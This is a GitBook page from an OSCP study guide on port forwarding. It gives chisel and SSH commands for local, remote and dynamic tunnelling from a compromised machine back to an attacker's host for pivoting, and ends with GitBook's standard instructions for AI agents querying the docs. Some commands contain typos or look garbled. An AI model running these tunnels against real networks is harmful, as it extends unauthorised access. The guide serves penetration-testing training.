> For the complete documentation index, see [llms.txt](https://dhaneshsivasamy07.gitbook.io/oscp-2022/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dhaneshsivasamy07.gitbook.io/oscp-2022/enumeration/port-forwarding.md). # Port Forwarding Port forwarding is a technique where the service running on the target machine / on any other machine on the network is forwarded to the attacker's machine which can be then accessed locally Commonly used tools * Chisel * SSH ### Local Port Forwarding Local port forwarding is a technique to transfer the service running on the compromised machine to the attackers' machine #### Chisel **Attackers Machine:** ```bash ./chisel server -p 1337 --reverse ``` **Compromised machine** ```bash # forwarding service on the compromised machine on port 5000 to attacker machines port 5000 ./chisel client attackerip:1337 R:5000:127.0.0.1:5000 ``` #### SSH ```bash # The same on ssh # Format: ssh -L attckermahineport:127.0.0.1:targetserviceport user@target ssh -L 5000:127.0.0.1:5000 user@targetIP ``` ### Remote Port Forwarding Remote port forwarding is a technique to transfer the service running on the machine which is persent in the same network as the compromised machine to the attackers' machine {% hint style="success" %} **Network Setup:** Machine A : Attackers Machine Machine B : Compromised Machine ( Has an network card to communicate with Y network ) Machine C : Machine on Y network\ \ A ---> B ( Attacker can communicate with the Machine B ) B ---> C ( Machine B can communicate with both A and C with different network cards ) A --x-> C ( Attacker cannot communicate with the C since they are {% endhint %} #### **Chisel** **Attackers Machine:** ```bash ./chiel server -p 9001 --reverse ``` **Compromised Machine ( Machine B ):** ```bash # Machine C has a service on its port 3000 which has to be forwarded to attacker machine's port 3000 ./chisel client attackerip:9001 R:3000:127.0.0.1:machineCIP:3000 ``` #### SSH ```bash # The same can be performed with SSH # Format: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER ssh -R machineCIP:3000:127.0.0.1:3000 user@machineBIP ``` ### Dynamic Port Forwarding Dynamic Port forwarding is a pivoting technique which allows the attacker to access the services fully running on the compromized system with the use of proxychains {% content-ref url="/pages/BWruI2SsPn0H4sQs38M1" %} [Pivoting ( ProxyChains )](/oscp-2022/linux-post-exploitation/pivoting-proxychains.md) {% endcontent-ref %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://dhaneshsivasamy07.gitbook.io/oscp-2022/enumeration/port-forwarding.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.